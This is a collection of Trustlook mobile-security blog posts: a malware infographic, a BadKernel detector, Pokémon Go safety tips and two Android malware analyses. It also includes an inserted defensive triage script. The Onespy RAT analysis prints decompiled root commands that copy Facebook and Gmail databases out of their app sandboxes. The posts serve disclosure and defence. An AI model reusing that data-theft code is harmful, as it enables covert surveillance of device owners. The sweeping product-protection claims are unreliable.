Top 5 Scariest Malware for Halloween

Happy Halloween! Trustlook has compiled a colorful Halloween Android malware infographic. Based on a study of 376,031 malware samples in the month of October, we have identified the Top 5 Scariest Malware families and offer a close-up look at actual malicious apps. Here is what is in the infographic:

▪ Descriptions of the Top 5 Scariest Malware families
▪ Access to detailed reports (clickable) of 20 real malicious apps
▪ Tips to stay protected against malware

Click here to view the infographic.

Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. The Trustlook Mobile Security protection is triggered, and the app is uploaded to Trustlook’s cloud. In a small number of cases Trustlook’s system has no prior knowledge of the app, so it is considered benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as malware.
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality. It’s not possible to have full, 100% coverage. So to mitigate these security risks, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

[two app screenshots: the BadKernel Vulnerability detector]

The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not using the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests that users not click on random links or links that appear suspicious. Trustlook also stresses that users should keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.

Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of 8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

[image: package icon]

Upon execution, the app persuades the user to grant device administrator access in order to maintain persistence on the system:

[screenshot: device administrator activation prompt]

The app runs itself as a service in the background:

[screenshot: the app running as a background service]

In the screenshot below, the second “Settings” entry is the cleverly disguised Remote Administration Tool (RAT) app:

[screenshot: two “Settings” entries in the app list]

The app is developed by “www.onespy.in” and signed with the following certificate:

[screenshot: signing certificate details]

Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the package one chooses, the registered user can perform different functions and retrieve data from many popular apps, including:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender
{
 // Copies a file as root: runs "su -c cp <src> <dst>" and treats exit status 0 as success
 private static boolean copyDB(String paramString1, String paramString2)
 {
   try
   {
     L.l("fb copy:" + paramString1 + ";" + paramString2);
     paramString1 = "cp " + paramString1 + " " + paramString2;
     int i = Runtime.getRuntime().exec(new String[] { "su", "-c", paramString1 }).waitFor();
     return i == 0;
   }
   catch (Exception paramString1)
   {
     L.l(paramString1);
   }
   return false;
 }

 // Extracts the "name" field from a JSON-encoded sender record
 private static String getName(String paramString)
 {
   try
   {
     paramString = new JSONObject(paramString).getString("name");
     return paramString;
   }
   catch (Exception paramString) {}
   return "";
 }

[…]

 // Copies Facebook's threads database to external storage and reads its messages table
 private static void sendThreadsTable(Context paramContext)
 {
   if (Environment.getExternalStorageState().equals("mounted")) {
     localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
   }
   for (;;)
   {
     str = localObject + "/fbdb2.db";
     if (Environment.getExternalStorageState().equals("mounted"))
     {
       localObject = Environment.getExternalStorageDirectory().getAbsolutePath();
       localObject = localObject + "/fb_chat.csv";
     }
     for (;;)
     {
       try
       {
         if (copyDB("/data/data/com.facebook.katana/databases/threads_db2", str))
         {
           L.l("fbdb copied");
           localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);
           localCursor = localSQLiteDatabase.rawQuery("SELECT sender, text, timestamp_ms FROM messages", null);
   […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader
{
 private static final String dbnamePrefix = "gmldbcp_";

 // Locates every Gmail mailstore database as root and copies each one out of the app sandbox
 private static String[] copyDB(Context paramContext)
 {
   Object localObject3;
   int i;
   int j;
   OutputStream localOutputStream;
   try
   {
     localObject1 = Runtime.getRuntime().exec(new String[] { "su", "-c", "find / -name mailstore*@gmail.com.db" }).getInputStream();
     Object localObject2 = new byte[660];
     localObject3 = new StringBuffer();
     for (;;)
     {
       i = ((InputStream)localObject1).read((byte[])localObject2);
       if (i == -1)
       {
         // one database path per line of "find" output
         localObject2 = ((StringBuffer)localObject3).toString().split("\n");
         localObject3 = new String[localObject2.length];
         j = 0;
         Process localProcess = Runtime.getRuntime().exec("su");
         localOutputStream = localProcess.getOutputStream();
         int k = localObject2.length;
         i = 0;
         if (i < k) {
           break;
         }
        […]
   // Derives the account name from the path and pipes a "cp" command into the root shell
   String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf('/') + 1, ((String)localObject1).lastIndexOf('@'));
   StringBuilder localStringBuilder = new StringBuilder("cp ").append((String)localObject1).append(" ");
   if (Environment.getExternalStorageState().equals("mounted")) {}
   for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())
   {
     localOutputStream.write(((String)localObject1 + "/" + "gmldbcp_" + str + ".db\n").getBytes());
     localObject3[j] = str;
     j += 1;
     i += 1;
     break;
   }
 }
      […]


One special feature the app provides is a remote command shell, which gives the controller access to the Linux system underlying the Android device:

public class ExecShell {
   // Enum of shell commands; the only entry looks for a "su" binary with /system/xbin/which
   public enum SHELL_CMD {
       public static final enum SHELL_CMD check_su_binary;

       static {
           SHELL_CMD.check_su_binary = new SHELL_CMD("check_su_binary", 0, new String[]{"/system/xbin/which", "su"});
           SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};
       }

       private SHELL_CMD(String arg1, int arg2, String[] command) {
           super(arg1, arg2);
           this.command = command;
       }

       public static SHELL_CMD valueOf(String arg1) {
           return Enum.valueOf(SHELL_CMD.class, arg1);
       }

       public static SHELL_CMD[] values() {
           SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;
           int v1 = v0.length;
           SHELL_CMD[] v2 = new SHELL_CMD[v1];
           System.arraycopy(v0, 0, v2, 0, v1);
           return v2;
       }
   }


Summary

The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

8 Facts You Have to Know for the Safest Pokemon Hunt

It’s capturing the world by storm. People are leaving their homes in droves and abandoning their normal lives in an attempt to catch them all. It is a Pokémon renaissance happening in 2016. In the early hours of the morning and the wee hours of the night, mass droves of people are heading to parks and lakes. Poke stops, the designated landmarks designed to help Poke Masters refill on poke balls and other essentials, are frequented by the young and the old. With seemingly entire countries obsessed with the game, many security experts are concerned with the permissions and information accessed by the game. In addition, there are real-world dangers in playing the game. Here are the top 8 things you need to know about Pokemon Go in order to stay safe.

1) Accessing your Google Account:

When first signing up for the popular game, a user has the option to sign up using their Google account or through a special Pokémon Trainers club. Simply for convenience’s sake, many people opt for the Google account registration. This just requires the user to enter their Google account login, such as an email, and a password for their Google account. The issue with this is that the app then has unrestricted access to all of a user’s Google account. The user is required to give access to the app so that the game may be played, but the user is not alerted to what the app can access, which is why it is aptly named “Full Account Access”. This proves to be problematic as the app could theoretically access photo libraries and billing information.

2) Camera Usage:

The app’s prized feature is an AR option that brings the Pokémon to life. In order to activate the augmented reality feature, a player must allow the app to access the device’s camera. The AR feature on the app is a huge draw for the players in the game, as it feels similar to reality. Using the AR feature, however, requires camera permission, which is another portal for possible data leakage. People take photos with the Pokémon but in turn end up capturing street addresses, car license plates, possible credit card information, and many other details.

3) GPS Tracking: Location, Location, Location.

Pokémon Go is an app that utilizes a user’s GPS location and camera to support its gameplay. These two permissions, however, prove to be problematic when it comes to mobile security. The game uses GPS to track where a player is and spawns rare Pokémon when many players are clustered together. This proves to be a high security threat because a hacker can pinpoint a player’s precise whereabouts.

4) Not watching where you’re going:

It’s been reported previously that people are having accidents left and right from obsessive game play. From players abandoning their cars in search of the rarest Pokémon to players falling off cliffs looking for an elusive Charmander, people are making their safety a secondary priority to the Hitmonchan hunt.

5) Armed robbery:

Hackers aren’t the only criminals after the players in Pokemon Go. Robberies are happening all over because of the level of game play. These low-life criminals drop lures on poke stops around different cities, meant to draw more Pokemon to the poke stop. Since these lures are public and visible within the app, many players will stop by these locations hoping to use the communal lures for their own Jigglypuff hunts. This helps round up potential victims and their valuable possessions into one common area, making for an easy trap.

6) Downloading a third party app:

Previously, the Pokemon Go app was only available in selected countries and areas. With the craze going so strong in the United States, countries like England and Canada were feeling major FOMO. Many users turned to third party apps to obtain the game and join in the worldwide obsession. This is a slippery slope, however. Many third party apps contain malware or phishing software. Added alongside the massive amount of permissions required to play the Pokemon app, this makes it a huge security threat.

7) Fake Apps:

A new group of dangerous applications targets Pokémon Go users by promising cheats, tips, and other functionality. Despite their innocuous-sounding titles, the apps actually contained malicious code that either tricked users into paying for expensive bogus services or took over victims’ phones to click porn ads, among other things.

8) Trustlook:

To ensure your safety and privacy, researchers cannot recommend strongly enough that you use a security application. Using an antivirus app that deeply scans and alerts you of any data breaches is vital during this kind of social frenzy. Trustlook can protect every player from all the threats of Pokemon Go and any other threat in the market. With ID Check, Boost, SD Card Scan, Backup and Restore, and many other features, Trustlook can make sure you stay safe while in hot pursuit of Pikachu. Download the Trustlook app here on the Google Play store today.

Banking Trojan targets clients of Russian financial institutions

— Trustlook Research Team

Trojans are pieces of software that appear as legitimate applications while exhibiting malicious behavior. Banking Trojans are specifically designed to steal a user’s online banking credentials. The banking trojan package analyzed here, discovered and detected by Trustlook, can be identified as having the following characteristics:

  • MD5: d6d2427df4c03a7cc61c97b4eebdd655
  • SHA256: 1974c82877a3abdffa6f9246138a3819c2c543a9c904a753bea3663bd21d9239
  • Size: 577590 bytes
  • App name: 2ГИС (Russian)
  • Package name: ru.drink.lime

The package icon is:

[image: package icon]

The app targets clients of Russian financial institutions. The malware earmarks potential victims by using text written in the Russian language to create a false sense of security. The malware has the ability to receive commands that will send and intercept SMS messages. Using the account information and password, a hacker is able to validate a money transfer via SMS messaging, a confirmation method commonly used in Russia.

The app forces the user to grant it device administrator rights in order to maintain persistence on the system:

[screenshot: device administrator activation prompt]

If the user denies the request, the app enters a loop and keeps popping up the “Activate device administrator” window. The following code snippets are used to perform these actions:

[screenshot: code that re-launches the admin activation prompt]

After installation, the app removes its own icon to hide from the user.

The app communicates with a remote server and sends out some personal information:

[screenshot: network traffic sending personal information to the server]

The following code snippets demonstrate the above behaviours:

[screenshot: code for the server communication]

The app checks whether the following packages are installed:

  • ru.sberbankmobile
  • com.android.vending
  • com.idamob.tinkoff.android
  • ru.vtb24.mobilebanking.android
  • ru.alfabank.mobile.android
  • ru.raiffeisennews

It then checks whether one of the above apps is running and starts a service accordingly, to copy content entered into forms that mimic those used by legitimate financial institutions in their client apps.
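A defender-side triage check, added here as an example and not part of Trustlook's write-ups or tooling: it parses the output of `adb shell pm list packages -f` and the device-admin section of `adb shell dumpsys device_policy`, flags the package names reported for the Onespy RAT and this banking trojan, and flags any user-installed app holding device-administrator rights, since both samples force that grant to resist removal. The two output samples are constructed for the example, modelled on the real formats rather than captured from a device.

```python
import re
# Indicators taken from the two Trustlook write-ups on this page
KNOWN_BAD_PACKAGES = {
    "com.path.call": "Android.Trojan.Pathcall (Onespy RAT)",
    "ru.drink.lime": "banking trojan posing as 2ГИС",
}

# Constructed sample of `adb shell pm list packages -f` output (not a real device)
SAMPLE_PM_LIST = """\
package:/system/priv-app/Settings/Settings.apk=com.android.settings
package:/data/app/com.path.call-2/base.apk=com.path.call
package:/data/app/ru.drink.lime-1/base.apk=ru.drink.lime
"""

# Constructed sample of the admin section of `adb shell dumpsys device_policy`
SAMPLE_DEVICE_POLICY = """\
  Enabled Device Admins (User 0, provisioningState: 0):
    com.android.settings/.DeviceAdminReceiver:
    com.path.call/.AdminReceiver:
      uid=10123
    ru.drink.lime/.DeviceAdmin:
  Password history length: 0
"""

def parse_pm_list(text):
    """Map package name -> APK path from `pm list packages -f` output."""
    pkgs = {}
    for line in text.splitlines():
        m = re.match(r"package:(?P<path>.+)=(?P<name>[\w.]+)$", line.strip())
        if m:
            pkgs[m.group("name")] = m.group("path")
    return pkgs

def parse_device_admins(text):
    """Return the set of packages holding device-administrator rights."""
    admins, in_section = set(), False
    for line in text.splitlines():
        if "Enabled Device Admins" in line:
            in_section = True
            continue
        if in_section and not line.startswith("    "):
            break  # left the indented admin list
        m = re.match(r"\s+([\w.]+)/\S+:$", line) if in_section else None
        if m:
            admins.add(m.group(1))
    return admins

def triage(pm_text, policy_text, trusted_admins=frozenset({"com.android.settings"})):
    """Return {package: [reasons]} for installed packages worth a closer look."""
    findings, admins = {}, parse_device_admins(policy_text)
    for pkg, path in parse_pm_list(pm_text).items():
        reasons = []
        if pkg in KNOWN_BAD_PACKAGES:
            reasons.append("matches indicator: " + KNOWN_BAD_PACKAGES[pkg])
        # both samples force a device-admin grant, so a user-installed admin outside the allowlist is suspicious
        if pkg in admins and pkg not in trusted_admins and path.startswith("/data/app/"):
            reasons.append("user-installed app holds device-administrator rights")
        if reasons:
            findings[pkg] = reasons
    return findings
```

On a real device, feed the two command outputs to `triage()`; the allowlist should be extended with whatever MDM or enterprise agent legitimately holds device-admin rights in your fleet.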

[screenshots: package and running-app checks]

The following code snippet is used by the malware to show the fake interface for the “ru.sberbankmobile” banking app:

[screenshots: code showing the fake “ru.sberbankmobile” interface]

The malware creates a SQL database to store the collected information. The table in the database has the following structure:

  • client_id integer
  • client_password TEXT
  • need_admin integer
  • need_card integer
  • first_bank integer
  • need_sber integer
  • need_tinkoff integer
  • need_vtb integer
  • need_alpha integer
  • need_raiff integer
  • server TEXT
  • filter TEXT
  • exist_bank_app integer

The malware is capable of communicating with the remote server to receive commands that will send and receive SMS messages; the attacker can use this to perform mobile fund transfers once they acquire the user’s banking credentials. The malware intercepts incoming SMS messages and can abort the broadcast of a message so that no new-message notification is shown to the end user.

[screenshot: SMS interception code]

This malware uses a set of instruction strings to communicate with the remote server; the strings are shown below:

  • taskUsssd
  • taskSms
  • deliverySms
  • okSmsSend
  • errorSmsSend